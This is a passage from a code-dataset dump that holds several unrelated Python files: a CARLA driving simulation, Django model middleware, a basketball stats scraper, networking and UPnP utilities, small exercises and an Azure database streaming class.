datetime.datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\")\n # f2 = open(outputImgPath+filename+'.txt','a')\n # f2.write(str(points))\n current_rot = sensor_data.transform.rotation\n debug = world.debug \n lists=[]\n for detect in sensor_data:\n azi = math.degrees(detect.azimuth)\n alt = math.degrees(detect.altitude)\n if abs(detect.velocity)>0 :\n lists.append([azi,detect.depth,detect.velocity])\n # lists.append(detect.depth)\n # lists.append(detect.velocity)\n # lists = np.reshape(lists, (-1, 3))\n outputImgPath=\"./output/\"\n filename = datetime.datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\")\n # data1=pd.DataFrame(list)\n # data1.to_csv(outputImgPath+filename+'.csv','w')\n f2 = open(outputImgPath+filename+'.txt','w')\n f2.write(str(lists))\n # The 0.25 adjusts a bit the distance so the dots can\n # be properly seen\n fw_vec = carla.Vector3D(x=detect.depth - 0.25)\n carla.Transform(\n carla.Location(),\n carla.Rotation(\n pitch=current_rot.pitch + alt,\n yaw=current_rot.yaw + azi,\n roll=current_rot.roll)).transform(fw_vec)\n\n def clamp(min_v, max_v, value):\n return max(min_v, min(value, max_v))\n\n norm_velocity = detect.velocity / 7.5 # range [-1, 1]\n r = int(clamp(0.0, 1.0, 1.0 - norm_velocity) * 255.0)\n g = int(clamp(0.0, 1.0, 1.0 - abs(norm_velocity)) * 255.0)\n b = int(abs(clamp(- 1.0, 0.0, - 1.0 - norm_velocity)) * 255.0)\n debug.draw_point(\n sensor_data.transform.location + fw_vec,\n size=0.075,\n life_time=0.06,\n persistent_lines=False,\n color=carla.Color(r, g, b))\n if 'camera' in sensor_name:\n array = np.frombuffer(sensor_data.raw_data, dtype=np.dtype(\"uint8\"))\n array = np.reshape(array, (1080, 1920, 4))\n array = array[:, :, :3]\n array = array[:, :, ::-1]\n # array = pygame.surfarray.make_surface(array.swapaxes(0, 1))\n im = Image.fromarray(array)\n outputImgPath=\"./output/\"\n filename = datetime.datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\")\n im.save(outputImgPath+str(filename)+'.jpg')\n # sensor_data.save_to_disk(os.path.join('../outputs/output_synchronized', '%06d.png' % sensor_data.frame))\n sensor_queue.put((sensor_data.frame, sensor_name))\n\n\ndef main():\n args = parser()\n logging.basicConfig(format='%(levelname)s: %(message)s', level=logging.INFO)\n\n vehicles_id_list = []\n sensor_list = []\n client = 
carla.Client(args.host, args.port)\n client.set_timeout(10.0)\n synchronous_master = False\n\n try: \n world = client.load_world('Town03')\n origin_settings = world.get_settings()\n traffic_manager = client.get_trafficmanager(args.tm_port)\n # every vehicle keeps a distance of 3.0 meter\n traffic_manager.set_global_distance_to_leading_vehicle(3.0)\n # Set physical mode only for cars around ego vehicle to save computation\n traffic_manager.set_synchronous_mode(True)\n # default speed is 30\n traffic_manager.global_percentage_speed_difference(-50)\n \n # Suggest using syncmode\n if args.sync:\n settings = world.get_settings()\n traffic_manager.set_synchronous_mode(True)\n if not settings.synchronous_mode:\n synchronous_master = True\n settings.synchronous_mode = True\n # 25fps\n settings.fixed_delta_seconds = 0.04\n world.apply_settings(settings)\n blueprints_vehicle = world.get_blueprint_library().filter(\"vehicle.*\")\n # sort the vehicle list by id\n blueprints_vehicle = sorted(blueprints_vehicle, key=lambda bp: bp.id)\n print (blueprints_vehicle)\n spawn_points = world.get_map().get_spawn_points()\n number_of_spawn_points = len(spawn_points)\n\n if args.number_of_vehicles < number_of_spawn_points:\n random.shuffle(spawn_points)\n elif args.number_of_vehicles >= number_of_spawn_points:\n msg = 'requested %d vehicles, but could only find %d spawn points'\n logging.warning(msg, args.number_of_vehicles, number_of_spawn_points)\n args.number_of_vehicles = number_of_spawn_points - 1\n\n # Use command to apply actions on batch of data\n SpawnActor = carla.command.SpawnActor\n SetAutopilot = carla.command.SetAutopilot\n # this is equal to int 0\n FutureActor = carla.command.FutureActor\n\n batch = []\n\n for n, transform in enumerate(spawn_points):\n if n >= args.number_of_vehicles:\n break\n\n blueprint = random.choice(blueprints_vehicle)\n\n if blueprint.has_attribute('color'):\n color = random.choice(blueprint.get_attribute('color').recommended_values)\n blueprint.set_attribute('color', color)\n if blueprint.has_attribute('driver_id'):\n driver_id = random.choice(blueprint.get_attribute('driver_id').recommended_values)\n blueprint.set_attribute('driver_id', driver_id)\n\n # set autopilot\n blueprint.set_attribute('role_name', 'autopilot')\n\n # spawn the cars and set their autopilot all together\n batch.append(SpawnActor(blueprint, transform)\n .then(SetAutopilot(FutureActor, True)))\n\n # excute the command\n for (i, response) in enumerate(client.apply_batch_sync(batch, synchronous_master)):\n if response.error:\n logging.error(response.error)\n else:\n print(\"Fucture Actor\", response.actor_id)\n vehicles_id_list.append(response.actor_id)\n\n vehicles_list = world.get_actors().filter('vehicle.*')\n # wait for a tick to ensure client receives the last transform of the vehicles we have just created\n if not args.sync or not synchronous_master:\n world.wait_for_tick()\n else:\n world.tick()\n \n # set several of the cars as normal car\n for i in range(args.number_of_vehicles):\n car = vehicles_list[i]\n traffic_manager.distance_to_leading_vehicle(car, 3)\n traffic_manager.vehicle_percentage_speed_difference(car, -80)\n\n\n \n\n # set several of the cars as dangerous car\n for i in range(args.number_of_dangerous_vehicles):\n danger_car = vehicles_list[i]\n # crazy car ignore traffic light, do not keep safe distance, and very fast\n traffic_manager.ignore_lights_percentage(danger_car, 100)\n traffic_manager.distance_to_leading_vehicle(danger_car, 0)\n 
traffic_manager.vehicle_percentage_speed_difference(danger_car, -100)\n\n print('spawned %d vehicles , press Ctrl+C to exit.' % (len(vehicles_list)))\n\n # create ego vehicle\n ego_vehicle_bp = world.get_blueprint_library().filter('model3')[0]\n # green color\n ego_vehicle_bp.set_attribute('color', '0, 0, 0')\n # set this one as ego\n ego_vehicle_bp.set_attribute('role_name', 'hero')\n # get a valid transform that has not been assigned yet\n transform = spawn_points[len(vehicles_id_list)]\n\n ego_vehicle = world.spawn_actor(ego_vehicle_bp, transform)\n ego_vehicle.set_autopilot(True)\n vehicles_id_list.append(ego_vehicle.id)\n\n # create sensor queue\n sensor_queue = Queue(maxsize=10)\n\n # add a camera\n camera_bp = world.get_blueprint_library().find('sensor.camera.rgb')\n camera_bp.set_attribute('image_size_x', str(1920))\n camera_bp.set_attribute('image_size_y', str(1080))\n camera_bp.set_attribute('fov', '60')\n camera_bp.set_attribute('sensor_tick', str(0.04))\n # camera relative position related to the vehicle\n\n # Manually selected camera location\n camera_transform = carla.Transform(carla.Location(-82.615005, -138.925934, 12.720448), carla.Rotation(-14.151550, 89.400490, -0.000276))\n camera = world.spawn_actor(camera_bp, camera_transform)\n # set the callback function\n camera.listen(lambda image_data: sensor_callback(image_data, sensor_queue, \"camera\",world))\n sensor_list.append(camera)\n\n # # we also add a radar on it\n # rad_bp = world.get_blueprint_library().find('sensor.other.radar')\n # rad_bp.set_attribute('horizontal_fov', str(30))\n # rad_bp.set_attribute('vertical_fov', str(30))\n # rad_bp.set_attribute('range', str(76))\n # rad_bp.set_attribute('sensor_tick', str(0.04)) \n # rad_bp.set_attribute('points_per_second', str(500))\n # # set the relative location\n # radar_location = carla.Location(0, 0, 2)\n # radar_rotation = carla.Rotation(0, 0, 0)\n # radar_transform = carla.Transform(radar_location, radar_rotation)\n # # spawn the radar\n # radar = world.spawn_actor(rad_bp, transform)\n # radar.listen(\n # lambda radar_data: sensor_callback(radar_data, sensor_queue, \"radar\", world))\n # sensor_list.append(radar)\n\n while True:\n if args.sync and synchronous_master:\n world.tick()\n # set the sectator to follow the ego vehicle\n spectator = world.get_spectator()\n # transform = ego_vehicle.get_transform()\n spectator.set_transform(transform)\n try:\n for i in range(0, len(sensor_list)):\n s_frame = sensor_queue.get(True, 1.0)\n print(\" Frame: %d Sensor: %s\" % (s_frame[0], s_frame[1]))\n except Empty:\n print(\" Some of the sensor information is missed\")\n else:\n world.wait_for_tick()\n\n finally:\n world.apply_settings(origin_settings)\n print('\\ndestroying %d vehicles' % len(vehicles_id_list))\n\n client.apply_batch([carla.command.DestroyActor(x) for x in vehicles_id_list])\n for sensor in sensor_list:\n sensor.destroy()\n print('done.')\n\n\nif __name__ == '__main__':\n\n try:\n main()\n except KeyboardInterrupt:\n print(' - Exited by user.')\n","sub_path":"test_rgb.py","file_name":"test_rgb.py","file_ext":"py","file_size_in_byte":12338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"279316603","text":"# -*- coding: utf-8 -*-\nfrom django.db.models.base import ModelBase\nfrom django.db import models\nimport types\n\ndef _filter_bases(bases, filter_key): \n \"\"\" Remove all classes descendants of ``filter_key`` from ``bases`` \"\"\"\n new_bases = tuple([base for base in bases \\\n if ((not (base is 
filter_key)) and (not issubclass(base, filter_key)))])\n    \n    # ensure that we don't end up with an orphan class - it must be\n    # parented by at least models.Model\n    if len(new_bases) == 0: new_bases = (models.Model,)\n    return new_bases\n\nclass Hooks(object):\n    _pre_saves = {}\n    _post_saves = {}\n    _pre_deletes = {}\n    _post_deletes = {}\n\nclass MetaModelMiddleware(ModelBase):\n    \n    # pre and post hooks for save() will be temporarily stored in these\n    #pre_saves = {}\n    #post_saves = {}\n    # pre and post hooks for delete()\n    #pre_deletes = {}\n    #post_deletes = {}\n    def __new__(cls, name, bases, attrs):\n        \n        # whether base classes should be filtered\n        cls.hide_bases = False\n        # only filter bases if this wasn't invoked by the ModelMiddleware\n        # class, which is a super class for all custom middleware, and the\n        # one we are using as a filter key\n        if not (name == 'ModelMiddleware'):\n            if not (ModelMiddleware in bases):\n                cls.hide_bases = True\n        if cls.hide_bases:\n            # replace the original bases with filtered ones to fool Django's inheritance\n            bases = _filter_bases(bases, ModelMiddleware)\n        # set the middleware options under Klass._middle\n        if attrs.has_key('Middle'):\n            midopts = attrs['Middle']\n            assert type(midopts) == types.ClassType, \"Middle attribute of %s model must be a class, not a %s object\" % (name, type(midopts))\n            opts = {}\n            opts.update([(k,v) for k,v in midopts.__dict__.items() if not k.startswith('_')])\n            attrs[\"_middle\"] = opts\n            attrs.pop('Middle')\n        return ModelBase.__new__(cls, name, bases, attrs)\n    \n    def __init__(cls,name,bases,attrs):\n        # provide a wrapper func for save()\n        def new_save(func):\n            def wrapper(*args, **kwargs):\n                if hasattr(cls, 'pre_saves'):\n                    [pre(args[0]) for pre in cls.pre_saves]\n                func(*args, **kwargs)\n                if hasattr(cls, 'post_saves'):\n                    [post(args[0]) for post in cls.post_saves]\n            return wrapper\n        # provide a wrapper func for delete()\n        def new_delete(func):\n            def wrapper(*args, **kwargs):\n                if hasattr(cls, 'pre_deletes'):\n                    [pre(args[0]) for pre in cls.pre_deletes]\n                func(*args, **kwargs)\n                if hasattr(cls, 'post_deletes'):\n                    [post(args[0]) for post in cls.post_deletes]\n            return wrapper\n        \n        # if this is a descendant of ModelMiddleware, but not ModelMiddleware itself\n        if name != 'ModelMiddleware':\n            # if this class inherits directly from ModelMiddleware then save its hooks\n            if ModelMiddleware in bases:\n                if attrs.has_key('pre_save'):\n                    Hooks._pre_saves[name] = attrs['pre_save']\n                if attrs.has_key('post_save'):\n                    Hooks._post_saves[name] = attrs['post_save']\n                if attrs.has_key('pre_delete'):\n                    Hooks._pre_deletes[name] = attrs['pre_delete']\n                if attrs.has_key('post_delete'):\n                    Hooks._post_deletes[name] = attrs['post_delete']\n            \n\n            # if this is NOT a direct descendant of ModelMiddleware - not a holder of callbacks\n            if ModelMiddleware not in bases:\n                orig_save = cls.save\n                orig_delete = cls.delete\n                for base in bases:\n                    base_pre_save = Hooks._pre_saves.get(base.__name__, False)\n                    if base_pre_save:\n                        if not hasattr(cls,'pre_saves'):\n                            cls.pre_saves = []\n                        cls.pre_saves.append(base_pre_save)\n                    base_post_save = Hooks._post_saves.get(base.__name__, False)\n                    if base_post_save:\n                        if not hasattr(cls, 'post_saves'):\n                            cls.post_saves = []\n                        cls.post_saves.append(base_post_save)\n                    base_pre_delete = Hooks._pre_deletes.get(base.__name__, False)\n                    if base_pre_delete:\n                        if not hasattr(cls, 'pre_deletes'):\n                            cls.pre_deletes = []\n                        cls.pre_deletes.append(base_pre_delete)\n                    base_post_delete = Hooks._post_deletes.get(base.__name__, False)\n                    if base_post_delete:\n                        if 
not hasattr(cls, 'post_deletes'):\n                            cls.post_deletes = []\n                        cls.post_deletes.append(base_post_delete)\n            cls.save = new_save(orig_save)\n            cls.delete = new_delete(orig_delete)\n            # replace original bases with filtered ones\n            bases = _filter_bases(bases,ModelMiddleware)\n        new_class = super(ModelBase,cls).__init__(name,bases,attrs)\n        return new_class\n    \n\nclass ModelMiddleware(models.Model):\n    \"\"\"\n    Custom model middleware components should subclass this and never\n    use the MetaModelMiddleware metaclass directly.\n    \"\"\"\n    __metaclass__ = MetaModelMiddleware\n    \n    \nclass ReSTMiddleware(ModelMiddleware):\n    def pre_save(self):\n        try:\n            opts = self.__class__._middle[\"ReST\"] # individual options are saved in a dict\n        except (AttributeError, KeyError):\n            return # just fail silently, though it might not be a very good idea in practice\n\n        # parse for as many fields as we have options for\n        for opt in opts: \n            # lets be nice to ourselves and provide a default value for the initial header level\n            if not opt.has_key(\"init_header\"):\n                opt[\"init_header\"] = 1 \n            try:\n                cont = getattr(self, opt[\"field\"]).decode(\"utf_8\")\n                # build_document (ReST -> HTML parts) is assumed to be provided by the project's docutils helpers\n                parts = build_document(cont, initial_header_level=opt[\"init_header\"])\n                setattr(self, opt[\"save_body\"], parts[\"html_body\"].encode('utf_8'))\n                setattr(self, opt[\"save_toc\"], parts[\"toc\"].encode('utf_8'))\n            except:\n                pass # another silent fail, needs fixing\n\nfrom datetime import datetime\n\nclass TimestampMiddleware(ModelMiddleware):\n    \"\"\"\n    This class can record a timestamp (down to one second precision) into any fields you specify.\n    There are two types of timestamps: 'always' and 'once'. 'always' means that record must be\n    made on every save(), while 'once' fields will be timestamped once on the first save() of this\n    object.\n    \n    A default set of options (used if none are provided by the model) is provided, which presume\n    the existence of 'pub_date' and 'last_modified' fields. The 'pub_date' field is of type \"once\",\n    and 'last_modified' is of type \"always\". This lets you timestamp the object's creation and modification\n    times.\n    \n    Example options (also the default ones):\n    \n    class Middle:\n        Timestamp = ({'field' : 'pub_date', 'type' : 'once'},\n                     {'field' : 'last_modified', 'type' : 'always'})\n    \"\"\"\n    def pre_save(self):\n        try:\n            opts = self.__class__._middle[\"Timestamp\"]\n        except (AttributeError, KeyError):\n            opts = ({'field' : 'pub_date', 'type' : 'once'},\n                    {'field' : 'last_modified', 'type' : 'always'})\n        \n        for opt in opts:\n            if not opt.has_key('type'):\n                opt['type'] = 'always'\n            d = datetime.now()\n            pdate = datetime(d.year, d.month, d.day, d.hour, d.minute)\n            # if this is a \"set once\" type of field, then we check whether\n            # it's been filled in and if not - do so\n            if opt['type'] == 'once':\n                if getattr(self, opt['field']) is None:\n                    setattr(self, opt['field'], pdate)\n            elif opt['type'] == 'always':\n                setattr(self, opt['field'], pdate)\n","sub_path":"westom/feednut/utils/model_utils.py","file_name":"model_utils.py","file_ext":"py","file_size_in_byte":8361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"382803504","text":"'''\nAuthor: Eunice Jun (@emjun)\nDate created: November, 4, 2019 \nPurpose: Transform a wide format dataset into long format\nUse: python3 longify.py <data_file.csv>\n'''\nimport sys\nimport csv\nimport pandas as pd \n\nif __name__ == \"__main__\":\n    if len(sys.argv) != 2: \n        print(\"Misusing script. 
Must include EXACTLY ONE parameter: python3 longify.py \")\n elif not sys.argv[1].endswith('.csv'): \n print(\"Data file must be a CSV file!\")\n else:\n wide_csv = sys.argv[1]\n wide_df = pd.read_csv(wide_csv)\n # long_df = pd.wide_to_long(wide_df, stubnames='Score', i=None, j='ID')\n cols_to_collapse = ['AR', 'TV']\n result_col = 'Score'\n \n import pdb; pdb.set_trace()\n long_df.to_csv()\n\n\n","sub_path":"examples/longify.py","file_name":"longify.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"328350475","text":"import ctypes\nimport hashlib\nimport json\nimport os\nimport socket\nimport urllib.request\n\nfrom colorama import Fore, Style, init\n\nimport miniupnpc\n\ninit()\n\n\nclass utils:\n @staticmethod\n def load_config():\n with open(\"config.json\", \"r\") as read_file:\n return json.load(read_file)\n\n @staticmethod\n def hash_file(file_name):\n sha1 = hashlib.sha1()\n f = open(file_name, 'rb')\n while 1:\n data = f.read(65536)\n if not data:\n break\n sha1.update(data)\n return sha1.hexdigest()\n\n @staticmethod\n def get_internal_ip():\n return (([\n ip for ip in socket.gethostbyname_ex(socket.gethostname())[2]\n if not ip.startswith(\"127.\")\n ] or [[(s.connect((\"8.8.8.8\", 53)), s.getsockname()[0], s.close())\n for s in [socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]\n ][0][1]]) + [\"no IP found\"])[0]\n\n @staticmethod\n def get_external_ip():\n return urllib.request.urlopen('https://ident.me').read().decode('utf8')\n\n @staticmethod\n def progress_bar(iteration,\n total,\n prefix='',\n suffix='',\n decimals=1,\n length=100,\n fill='█',\n speed=0.0):\n prefix = 'Receiving:'\n percent = (\"{0:.\" + str(decimals) + \"f}\").format(\n 100 * (iteration / float(total)))\n filled_length = int(length * iteration // total)\n bar = Style.BRIGHT + Fore.GREEN + fill * filled_length + \\\n Fore.RED + '-' * (length - filled_length) + Style.RESET_ALL\n print('\\r%s |%s| %s%% %s %s ' %\n (prefix, bar, percent, suffix, round(speed, 1)) + Style.BRIGHT\n + Fore.CYAN + 'MB/S' + Style.RESET_ALL,\n end='\\r')\n\n @staticmethod\n def upnp_open(port):\n port = int(port)\n upnp = miniupnpc.UPnP()\n upnp.discoverdelay = 10\n upnp.discover()\n upnp.selectigd()\n upnp.addportmapping(port, 'TCP', upnp.lanaddr, port, 'RadolynTCP', '')\n\n @staticmethod\n def upnp_close(port):\n port = int(port)\n upnp = miniupnpc.UPnP()\n upnp.discoverdelay = 10\n upnp.discover()\n upnp.selectigd()\n upnp.deleteportmapping(port, 'TCP')\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"532542185","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jan 8 13:46:01 2015\n\n@author: weinfz18\n\"\"\"\n\nimport os\nimport numpy as np\nimport csv\nimport lxml.html\nfrom lxml import etree\ndef astext(elem):\n \"Return stripped text value of element\"\n return etree.tostring(elem, method='text').strip()\nyears = ['2012','2013','2014','2015']\ndata = {}\npo = 0\nfor year in years:\n site = 'http://www.basketball-reference.com/leagues/NBA_' + year +'_totals.html'\n page = lxml.html.parse(site)\n rows = page.xpath('//tr')\n stuff = [row.xpath('*//text()') for row in rows]\n stuff = [[str(s) for s in t] for t in stuff]\n for i in range(len(stuff)):\n if len(stuff[i])!=30:\n if stuff[i][8]=='0' and stuff[i][9]=='0':\n stuff[i] = stuff[i][:10] + [''] + stuff[i][10:]\n if 
len(stuff[i])!=30:\n if stuff[i][11]=='0' and stuff[i][12]=='0':\n stuff[i] = stuff[i][:13] + [''] + stuff[i][13:]\n if len(stuff[i])!=30:\n if stuff[i][14]=='0' and stuff[i][15]=='0':\n stuff[i] = stuff[i][:16] + [''] + stuff[i][16:]\n if len(stuff[i])!=30:\n if stuff[i][8]=='0' and stuff[i][9]=='0':\n stuff[i] = stuff[i][:17] + [''] + stuff[i][17:]\n if len(stuff[i])!=30:\n if stuff[i][18]=='0' and stuff[i][19]=='0':\n stuff[i] = stuff[i][:20] + [''] + stuff[i][20:]\n if len(stuff[i])!=30:\n po+=1\n #etree.tostring(elem, method='text').strip()\n #row.xpath('./*/text()')\n data[year] = stuff\n\n \n#%%\nimport string\ndef get_data(filename):\n '''function to read the data form the input csv file to use in the analysis'''\n with open(filename, 'r') as f:\n reader = csv.reader(f,delimiter=',') \n #returns all the data from the csv file in list form\\\n return list(reader)\n \npunct = set(string.punctuation)\nos.chdir(\"C:\\\\Users\\\\weinfz18\\\\Documents\\\\nba\\\\model\")\n\nplayers = get_data('o3take.csv')\nplayers = [x[1] for x in players]\nstats = [None]*len(players)\nfor i in range(len(players)):\n players[i] = 'Luc Mbah a Moute' if players[i]=='Luc Moute' else players[i]\n players[i] = 'Danny Green' if players[i]=='Daniel Green' else players[i]\n players[i] = 'Ish Smith' if players[i]=='Ishmael Smith' else players[i]\n players[i] = 'Jose Barea' if players[i]=='J.J. Barea' else players[i]\n players[i] = 'Louis Williams' if players[i]=='Lou Williams' else players[i]\n players[i] = 'Maurice Harkless' if players[i]=='Moe Harkless' else players[i]\n players[i] = 'Patrick Mills' if players[i]=='Patty Mills' else players[i]\n for year in years:\n for j in range(len(data[year])):\n if ''.join(x for x in (str(players[i]).lower()) if x not in punct) in ''.join(x for x in (str(data[year][j][1]).lower()) if x not in punct):\n stats[i]=[data[year][j]]\n continue\nmissing = [players[x] for x in range(len(players)) if stats[x] is None] \nstats = [stats[x][0] for x in range(len(stats)-2)] \nstats = np.array(stats) \n#%%\ngames = stats[:,5].astype(np.float)\nthrees = stats[:,11:13].astype(np.float)\nthree_percent = threes[:,0]/threes[:,1]\nthree_percent = np.nan_to_num(three_percent)\na_3s_per_game = threes[:,1]/games\nbayes = ((a_3s_per_game)*(three_percent)+((4/5)*22*.351))/(a_3s_per_game+(4/5)*22)\nbayes = np.nan_to_num(bayes)\nintercept = np.log(.351/(1-.351))\nbayes = np.log(bayes/(1-bayes))\nbayes = bayes - intercept\nplayers = np.array(players[:-2])\nbayes = np.vstack((players,bayes))\nbayes = np.transpose(bayes)\nos.chdir(\"C:\\\\Users\\\\weinfz18\\\\Documents\\\\nba\")\nnp.savetxt(\"o3make_priors.csv\",bayes,delimiter=\",\",fmt=\"%s\") \n#stats = np.array(stats[:-2]) \n#%% \ngames = stats[:,5].astype(np.float)\nthrees = stats[:,11:13].astype(np.float)\nfgs = stats[:,8:10].astype(np.float)\nthree_percent_takes = threes[:,1]/fgs[:,1]\nthree_percent_takes = np.nan_to_num(three_percent_takes)\na_fgs_per_game = fgs[:,1]/games\navg_percent = 22/83\nbayes = ((a_fgs_per_game)*(three_percent_takes)+((4/5)*83*avg_percent))/(a_fgs_per_game+(4/5)*83)\nbayes = np.nan_to_num(bayes)\nintercept = np.log(avg_percent/(1-avg_percent))\nbayes = np.log(bayes/(1-bayes))\nbayes = bayes - intercept\nplayers = np.array(players[:-2])\nbayes = np.vstack((players,bayes))\nbayes = np.transpose(bayes)\nos.chdir(\"C:\\\\Users\\\\weinfz18\\\\Documents\\\\nba\")\nnp.savetxt(\"o3take_priors.csv\",bayes,delimiter=\",\",fmt=\"%s\") 
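# ---- worked check of the shrinkage above (hypothetical numbers, not taken from the data) ----\n# a player with 120 threes attempted out of 300 FGA over 60 games gives\n# a_fgs_per_game = 300/60 = 5.0 and three_percent_takes = 120/300 = 0.4; with\n# k = (4/5)*83 = 66.4 pseudo-shots at the league rate avg_percent = 22/83 ~ 0.265,\n# the shrunk rate is (5.0*0.4 + 66.4*0.265)/(5.0 + 66.4) ~ 0.275, which the\n# logit step then centers on the league average: np.log(p/(1-p)) - intercept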
\n#%%","sub_path":"get_priors.py","file_name":"get_priors.py","file_ext":"py","file_size_in_byte":4424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"532611433","text":"from src.asserts import assert_equal, assert_is\nfrom src.otter import Otter, Status\nfrom src.unittest import UnitTest, TestCase\nfrom test.test_classes import test_class\n\n\nclass ExecuteTestSuccessTest(UnitTest):\n def set_up(self):\n self.otter = Otter([])\n self.test_object = test_class()\n self.otter.set_test_list(\n [self.test_object]\n )\n self.otter.get_test_list()[0].set_up()\n self.unit = self.otter.get_test_list()[0]\n self.case = {\n \"func\": test_class.test_case_one,\n \"name\": \"test_case_one\"\n }\n self.otter.execute_test(self.unit, self.case)\n self.result = self.otter.get_results()[0]\n\n def tear_down(self):\n self.otter = None\n\n @TestCase\n def test_execute_test_status(self):\n assert_equal(\n self.result[\"status\"],\n Status.OK,\n message=\"Status was not OK.\"\n )\n\n @TestCase\n def test_execute_test_message(self):\n assert_equal(\n self.result[\"message\"],\n \"\"\n )\n\n @TestCase\n def test_execute_test_unit(self):\n assert_is(\n self.result[\"unit\"],\n self.unit\n )\n\n @TestCase\n def test_execute_test_case(self):\n assert_is(\n self.result[\"case\"],\n self.case[\"name\"]\n )\n","sub_path":"test/execute_test_success_test.py","file_name":"execute_test_success_test.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"47279174","text":"# Ask the user for a number.\n# Depending on whether the number is even or odd,\n# print out an appropriate message to the user\n\nx = 221 # this is even\n\nresult = x % 2\nif (result == 0): # this is even\n print('even')\nelse: # this is odd\n print('odd')\n","sub_path":"Superprof/some_basics/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"219302973","text":"#1.print numbers from 7-19\nprint (\"Numbers from 7-19\")\ni=7\nwhile (i<=19):\n print (i)\n i += 1\nprint (\"\") \n \n \n \n \n \n#2.print even numbers between 12-20\nprint (\"Even Numbers Between 12 and 20\")\na=13\nwhile a<20:\n if a%2!=0:\n a += 1\n else:\n print(a)\n a += 1\nprint (\"\")\n \n \n \n \n\n#3.function that takes two numbers and prints even numers between them\nprint (\"Determine Even Numbers in the Inputs\")\ndef even():\n a = int(input(\"Enter number 1: \"))\n b = int(input(\"Enter number 2: \"))\n while a!=0 and b!=0:\n \n while a%2==0 and b%2!=0:\n return print (\"'\",a,\"' \"\"is an even number\" \" '\",b,\"' \" \"is not\")\n \n while a%2!=0 and b%2==0:\n return print (\"'\",b,\"' \"\"is an even number\"\" '\",a,\"' \"\"is not\")\n \n while a%2==0 and b%2==0:\n return print (\"'\",a,\"' \"\"and\"\" '\",b,\"' \"\"are even numbers\")\n print (\"Zero is not accepted\")\n a = int(input(\"Enter number 1: \"))\n b = int(input(\"Enter number 2: \")) \nprint (even()) \n\n ","sub_path":"while_loop.py","file_name":"while_loop.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"171602670","text":"from neural_nets import squeezedet as nn\nfrom modify_primitives.utils import *\nfrom modify_primitives.heatmap import *\nfrom ml_primitives.sampling_primitives import *\nfrom populateLibrary import *\nimport glob\n \ncars = 
glob.glob(\"pics/cars/*.png\")\nroads = glob.glob(\"pics/roads/*.jpg\")\n\nconf = nn.init()\n\n\nDIM = 2\nout = 'pics/out/'\n\nLib = populateLibrary()\n\nsamples = halton_sampling(2, 1)\n\nfor road in roads[:1]:\n out_pic_name = out + \"tmp.png\"\n im = Image.open(road)\n\n for sample in samples[:1]:\n loc = generatePicture(Lib, [sample[0], sample[1], 1, 1, 1, 1], \"tmp.png\", i-130, 3)\n confidence = nn.classify(out_pic_name, conf)\n print(confidence)\n if not confidence:\n score = 0\n else:\n try:\n if confidence[0][0][0] == 0:\n score = int(confidence[0][0][1]*100)\n else:\n score = 0\n except IndexError:\n break\n print(score)\n col = rgb(0,100,score)\n im = draw_circle(im, loc[0], loc[1], 5, col)\n w.writerow(sample+[score])\n\n im.save(OUT_PIC_PATH + pic_name)\n f.close()\n","sub_path":"picture_generator.py","file_name":"picture_generator.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"557703072","text":"import copy\nimport emoji\nimport datetime\nimport dbstream\nimport pyodbc\nimport os\n\nimport re\nimport requests\n\nfrom pyzure.core.Column import create_columns, change_column_type\nfrom pyzure.core.Table import create_table\nfrom pyzure.core.tools.print_colors import C\nfrom pyzure.core.tools.progress_bar import print_progress_bar\n\n\ndef extract_emojis(str_):\n return ''.join(c for c in str_ if c in emoji.UNICODE_EMOJI or c in ('🏻', '🇺', '🇸', '🇬', '🇧'))\n\n\ndef replace_all_emoji(str_):\n for i in extract_emojis(str_):\n str_ = str_.replace(i, '???')\n return str_\n\n\nclass AzureDBStream(dbstream.DBStream):\n def __init__(self, instance_name, client_id):\n super().__init__(instance_name, client_id=client_id)\n self.instance_type_prefix = \"AZURE\"\n self.ssh_init_port = 6544\n\n def credentials(self):\n creds = super().credentials()\n alias = self.instance_type_prefix + \"_\" + self.instance_name\n if os.environ.get(alias + \"_DRIVER_PATH\"):\n driver = os.environ.get(alias + \"_DRIVER_PATH\")\n else:\n driver = os.environ.get(alias + \"_DRIVER\")\n creds.update({\n \"uid\": creds[\"user\"],\n \"server\": creds[\"host\"],\n \"driver\": driver,\n \"TDS_Version\": \"7.2\"\n })\n return creds\n\n def _execute_query_custom(self, query, data=None):\n connection_kwargs = self.credentials()\n con = pyodbc.connect(**connection_kwargs)\n cursor = con.cursor()\n try:\n if data:\n cursor.execute(query, data)\n else:\n cursor.execute(query)\n except Exception as e:\n cursor.close()\n con.close()\n raise e\n result = []\n try:\n columns = [column[0] for column in cursor.description]\n\n for row in cursor.fetchall():\n dict_ = dict()\n for i in range(len(columns)):\n dict_[columns[i]] = row[i]\n result.append(dict_)\n except (pyodbc.ProgrammingError, TypeError):\n pass\n con.commit()\n cursor.close()\n con.close()\n query_create_table = re.search(\"(?i)(?<=((into ))).*(?=\\n)\", query)\n if result:\n return [dict(r) for r in result]\n elif query_create_table:\n return {'execute_query': query_create_table}\n else:\n return None\n\n def _send(\n self,\n data,\n replace,\n batch_size=1000,\n sub_commit=True):\n # Time initialization\n start = datetime.datetime.now()\n\n # Extract info\n rows = 